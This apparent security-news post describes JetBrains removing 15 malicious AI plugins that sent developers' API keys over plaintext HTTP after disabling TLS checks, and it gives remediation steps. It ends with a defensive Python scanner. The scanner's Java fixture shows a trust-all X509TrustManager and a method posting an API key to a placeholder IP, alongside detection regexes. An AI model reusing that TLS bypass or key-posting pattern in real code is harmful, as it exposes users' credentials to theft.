
15 Malicious AI Plugins on JetBrains Marketplace Stole API Keys via Unencrypted HTTP

blog.jetbrains.com · @systems_wire · 3 hours ago · Cybersecurity · 4 comments

JetBrains purged 15 plugins that harvested AI provider API keys and exfiltrated them in plaintext to a hardcoded C2 server at 39.107.60 51.

Tags: jetbrains, deepseek, malicious plugins, api key theft, supply chain security, ide security

15 plugins on JetBrains Marketplace masqueraded as AI utilities while quietly stealing developer-configured AI provider API keys and shipping them in plaintext to a hardcoded C2 server at 39.107.60 51.

15 Plugins, One C2 Server: How the Exfiltration Worked

The plugins carried names like "DeepSeek Junit Test", "AI FindBugs", and "CodeGPT AI Assistant" and offered text generation or unit testing. When a developer entered an OpenAI, DeepSeek, or SiliconFlow API key into the plugin settings and clicked "Apply", the plugin executed an unauthorized backend function. To keep the exfiltration quiet, the threat actors installed a JVM-wide X509TrustManager that disabled unsigned and self-signed TLS warnings, which prevented local IDE debuggers and network monitors from flagging the outbound connection. The validated key string then traveled as a plaintext JSON payload over unencrypted HTTP directly to 39.107.60 51. JetBrains noted that its Plugin Verifier tool historically checked compatibility and API usage, not data flow or anti-malware behavior. Because the core APIs looked normal and neither the hardcoded IP nor the custom TLS configuration was flagged during ingestion, these plugins slipped through.

JetBrains Cleaned House: Remote Kill and Publisher Bans

On June 16, 2026, JetBrains received security reports. Within hours, all 15 plugins were purged from the Marketplace and blocked from future downloads, and the 7 publisher accounts behind the campaign were permanently terminated. JetBrains also triggered its remote kill switch: all affected plugins were marked as broken in the backend, so they are disabled instantly on the next IDE relaunch. No internal JetBrains source code, development environments, or corporate infrastructure were compromised.

Your API Keys Are Toast: Immediate Steps

Any token entered into these plugins must be treated as exposed. Go to your developer consoles at OpenAI, DeepSeek, SiliconFlow, or other providers and permanently revoke those secrets. Generate fresh keys with tight scopes: use model-specific tokens and spending caps, not root keys. Check your AI provider dashboards for spikes in API spend or unrecognized queries tied to the malicious IP. Corporate admins should block 39.107.60 51 at the firewall and in DNS blocklists. Also scan your repositories to ensure no active AI provider tokens were committed to version control.

JetBrains is deploying new rule layers to its ingestion pipeline that flag raw IP endpoints, unauthorized TLS weakening (such as a custom X509TrustManager), and automation triggers for plugin handling of sensitive API keys. For future AI tool integrations, JetBrains recommends the Agent Client Protocol (ACP), an open standard built with Zed that restricts plugin communication to structured inputs and outputs, reducing the attack surface.

Revoke those keys now. Block that IP. The next campaign will try something different.
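As an added illustration (not code from JetBrains, the Marketplace pipeline, or the removed plugins) of the ingestion rules described above and the traits the exfiltration relied on, the following Python scanner flags three things in plugin source: raw IP endpoints, plaintext http:// URLs, and a custom X509TrustManager whose checkServerTrusted body is empty. Both source samples are constructed for the example, and 203.0.113.10 is a documentation-range placeholder, not the campaign's C2 address.

```python
import re

# Constructed sample in the shape of a Java plugin settings class; the IP is a
# documentation-range placeholder, not an address recovered from the campaign.
SUSPICIOUS_SRC = """
import javax.net.ssl.X509TrustManager;
public class Settings {
    static final String ENDPOINT = "http://203.0.113.10/collect";   // placeholder IP
    static class TrustAll implements X509TrustManager {
        public void checkServerTrusted(X509Certificate[] c, String a) { }
        public void checkClientTrusted(X509Certificate[] c, String a) { }
        public X509Certificate[] getAcceptedIssuers() { return null; }
    }
    void apply(String apiKey) { post(ENDPOINT, apiKey); }
}
"""

# Constructed benign sample: HTTPS to a named host, default JVM trust store.
BENIGN_SRC = """
public class Settings {
    static final String ENDPOINT = "https://api.openai.com/v1/chat/completions";
    void apply(String apiKey) { post(ENDPOINT, apiKey); }
}
"""

# One regex per ingestion rule; each is evaluated line by line.
RULES = {
    "raw-ip-endpoint": re.compile(r'https?://(?:\d{1,3}\.){3}\d{1,3}'),
    "plaintext-http": re.compile(r'"http://'),
    "custom-trustmanager": re.compile(r'implements\s+X509TrustManager'),
    "empty-trust-check": re.compile(r'checkServerTrusted\([^)]*\)\s*\{\s*\}'),
}

# Rules that alone justify rejecting the upload; a custom TrustManager by
# itself is only reported, since it may legitimately pin certificates.
BLOCKING = {"raw-ip-endpoint", "plaintext-http", "empty-trust-check"}


def scan(source: str) -> dict[str, list[int]]:
    """Return rule name -> 1-based line numbers in `source` that matched it."""
    hits: dict[str, list[int]] = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def verdict(hits: dict[str, list[int]]) -> str:
    """'reject' if any blocking rule fired, otherwise 'accept'."""
    return "reject" if BLOCKING & set(hits) else "accept"


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SRC), ("benign", BENIGN_SRC)):
        found = scan(src)
        print(label, verdict(found), found)
```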


Source: JetBrains Marketplace Ecosystem Security Update: Addressing Malicious Third-Party AI Plugins
Domain: blog.jetbrains.com
